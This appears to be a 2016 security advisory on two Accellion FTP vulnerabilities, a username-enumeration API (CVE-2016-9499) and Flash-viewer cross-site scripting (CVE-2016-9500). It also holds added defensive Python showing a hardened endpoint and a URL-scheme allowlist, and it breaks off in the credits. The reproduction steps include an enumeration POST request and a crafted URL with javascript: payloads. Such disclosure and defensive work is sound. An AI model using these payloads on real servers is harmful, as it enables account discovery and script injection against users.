December 06, 2016 


Accellion FTP Multiple Security Vulnerabilities 


SYSTEMS AFFECTED: 


All versions 


Reference: http://www.accellion.com/ 


VULNERABILITY DETAILS: 


Vulnerability #1: Username Enumeration via API 


Accellion allows username enumeration for accounts present on the FTP server. If an invalid account 
is passed to the server, the server returns that username in the response, whereas nothing is returned 
when the username is a valid, existing account. 


RISK FACTOR: Medium 

CVSS: AV:N/AC:L/Au:N/C:C/I:N/A:N 

CVE-2016-9499 

URL: https://<server_url>/courier/isInvalidRecipient.api 
Reproduction Steps: 


1. Perform the provided POST request against the IP/URL of the server. In the recipient field, supply a list 
of arbitrary user names. 

2. If a username exists, a value of 0 is returned in the response, meaning that 0 usernames were 
found to be invalid; for invalid usernames, the number of invalid usernames and the 
list of those usernames is returned. 


Please find below the snapshots for the POC stated above. 

[Screenshot 1: HTTP POST to https://<server_url>/courier/isInvalidRecipient.api with Content-Type application/x-www-form-urlencoded and a body of the form recipient=<redacted valid user>,test@test.com. Annotation: only one invalid username (test@test.com) is returned, which means the other username is valid.] 

Valid username response 

[Screenshot 2: the same POST with body recipient=asdf@afds.com,test@test.com. Annotation: the response lists the invalid usernames, or the accounts connected with LDAP.] 

Invalid username response 


Successful exploitation of this vulnerability allows an unauthorized user to enumerate 
usernames for accounts present on the FTP server, or in LDAP if LDAP credentials 
are linked with the server. 
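The following is an added illustration, not Accellion's code, of the response differential described above and of one way to close it: the vulnerable handler returns the count and list of unknown recipients to any caller, so every name missing from that list is confirmed to exist; the hardened handler requires an authenticated session, caps recipients per call and calls per session, and reports only syntactic problems, so its response has the same shape whether or not a well-formed name exists. The directory, session store and handler names are constructed assumptions.

```python
"""Added example (not Accellion's code): the recipient-check oracle behind
CVE-2016-9499, and a hardened variant that does not disclose account existence.
The user directory, session store and function names are constructed."""
from __future__ import annotations
import re
from collections import defaultdict

# Constructed sample directory; a real server would consult its account
# database or LDAP.
USER_DIRECTORY = {"alice@example.com", "bob@example.com"}


def vulnerable_is_invalid_recipient(recipient_param: str) -> dict:
    """Mirrors the behaviour the advisory describes: the caller sends a
    comma-separated list and receives the count and list of names the server
    does NOT know. Any name missing from the list is a valid account, so an
    unauthenticated caller can test candidate usernames in bulk."""
    names = [n.strip() for n in recipient_param.split(",") if n.strip()]
    invalid = [n for n in names if n not in USER_DIRECTORY]
    return {"invalidCount": len(invalid), "invalid": invalid}


EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
MAX_RECIPIENTS = 20          # cap per call (constructed value)
MAX_CALLS_PER_SESSION = 50   # cap per session (constructed value)
_calls: dict[str, int] = defaultdict(int)


def hardened_is_invalid_recipient(session_id: str | None, recipient_param: str,
                                  sessions: dict) -> dict:
    """Hardened variant: requires an authenticated session, caps the number of
    recipients per call and calls per session, and reports only malformed
    addresses. Whether an account exists is never disclosed here; recipient
    resolution happens server-side after the send is committed."""
    if session_id is None or session_id not in sessions:
        return {"error": "authentication required"}
    _calls[session_id] += 1
    if _calls[session_id] > MAX_CALLS_PER_SESSION:
        return {"error": "rate limit exceeded"}
    names = [n.strip() for n in recipient_param.split(",") if n.strip()]
    if len(names) > MAX_RECIPIENTS:
        return {"error": "too many recipients"}
    malformed = [n for n in names if not EMAIL_RE.match(n)]
    # Same response shape regardless of whether any well-formed name exists.
    return {"malformedCount": len(malformed), "malformed": malformed}


if __name__ == "__main__":
    print(vulnerable_is_invalid_recipient("alice@example.com,test@test.com"))
    print(hardened_is_invalid_recipient(None, "alice@example.com", {}))
    print(hardened_is_invalid_recipient("s1", "alice@example.com,nobody", {"s1": "alice"}))
```

If the product genuinely needs to tell authenticated senders about unknown internal recipients, that check must at least sit behind the authentication, per-call cap and per-session rate limit shown here; the unauthenticated, unbounded endpoint in the advisory offers none of these.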


Vulnerability #2: Cross-site Scripting 


Accellion makes use of a Flash component from Accusoft's Prizm Content. The Flash component accepts 
various programming parameters which can be set to carry a cross-site scripting payload. Using this 
functionality, an external attacker can send victims a link containing the XSS payload. 


RISK FACTOR: Medium 
CVSS: AV:N/AC:L/Au:N/C:C/I:N/A:N 
CVE-2016-9500 

Reproduction Steps: 


1. In a browser, open the following URL: 

https://<server_url>/courier/web/ViewerEnterpriseAnnotation.swf?&translationTool=No&javascriptEvents=YES&reviewTab=No&viewTab=No&searchTab=No&customTabName=test&customTabCategoryName=CLICK%20ME&customButton1Url=javascript:alert(document.location)&customButton1Tooltip=yup&navButton=no&printDocument=no&zoomButton=no&saveDocumentLocation=http://google.com&saveDocument=yes&selectedTab=test&buttonHomeZoom=No&buttonHomeFit=no&buttonHomeClip=no&toolbarButtonsSize=50&customButton1Image=javascript:alert(1); 


[Screenshot: the viewer loaded in a browser with the crafted URL, showing the injected custom button and the CLICK ME tab. URL in the address bar: 
https://<server_url>/courier/web/ViewerEnterpriseAnnotation.swf?&translationTool=No&javascriptEvents=YES&reviewTab=No&viewTab=No&searchTab=No&customTabName=HOME&customTabCategoryName=CLICK%20ME&customButton1Url=javascript:alert%28document.location%29&customButton1Tooltip=yup&navButton=no&printDocument=no&zoomButton=no&saveDocumentLocation=http://google.com&saveDocument=yes&selectedTab=HOME&buttonHomeZoom=No&buttonHomeFit=no&buttonHomeClip=no&toolbarButtonSize=100&sendViewerEvents=Yes&alert=1] 
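The root cause above is that viewer parameters which become link targets (customButton1Url, customButton1Image, saveDocumentLocation in the reproduction URL) accept any scheme, including javascript:. Below is an added example, not Accusoft's or Accellion's code, of the server-side check such parameters need: only http(s) URLs or same-origin relative paths are passed through, and every other scheme is dropped. The parameter names are taken from the advisory URL; which of them are URL-typed, and the function names, are assumptions. The sample query is constructed from the advisory's reproduction URL.

```python
"""Added example (not the vendor's code): allowlist validation of viewer
parameters that end up as link targets, the parameter class abused in
CVE-2016-9500. Parameter names come from the advisory; the rest is constructed."""
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Assumed to be the URL-typed parameters; the viewer's real set may differ.
URL_PARAMS = {"customButton1Url", "customButton1Image", "saveDocumentLocation"}
ALLOWED_SCHEMES = {"http", "https"}
# Browsers ignore ASCII whitespace and C0 controls when reading the scheme, so
# "java\tscript:" still executes; strip those before inspecting the value.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")


def sanitize_link(value: str) -> str | None:
    """Return the value if it is a plain http(s) URL or a same-origin relative
    path, otherwise None. Any other scheme (javascript:, data:, vbscript:, ...)
    and any scheme-relative "//host" form is rejected."""
    cleaned = _CTRL_WS.sub("", value)
    parts = urlsplit(cleaned)
    if parts.scheme:
        if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
            return None
        return urlunsplit(parts)
    if cleaned.startswith("/") and not cleaned.startswith("//"):
        return cleaned
    return None


def validate_viewer_params(query: str) -> tuple[dict, list[str]]:
    """Parse a viewer query string; drop every URL-typed parameter whose value
    is not a plain link. Returns (accepted_params, rejected_param_names)."""
    accepted, rejected = {}, []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        value = values[0]
        if name in URL_PARAMS:
            safe = sanitize_link(value)
            if safe is None:
                rejected.append(name)
                continue
            value = safe
        accepted[name] = value
    return accepted, rejected


# Constructed query modelled on the advisory's reproduction URL.
SAMPLE_QUERY = (
    "translationTool=No&javascriptEvents=YES&customTabName=test"
    "&customTabCategoryName=CLICK%20ME"
    "&customButton1Url=javascript:alert(document.location)"
    "&customButton1Tooltip=yup&saveDocumentLocation=http://google.com"
    "&customButton1Image=javascript:alert(1);&selectedTab=test"
)

if __name__ == "__main__":
    ok, dropped = validate_viewer_params(SAMPLE_QUERY)
    print("accepted:", ok)
    print("rejected:", dropped)
```

Rejecting rather than escaping is deliberate: these values are consumed by the Flash viewer as navigation targets, so output encoding does not help, and only a scheme allowlist keeps a javascript: URI from ever reaching the component.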


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Qualys Application Security and 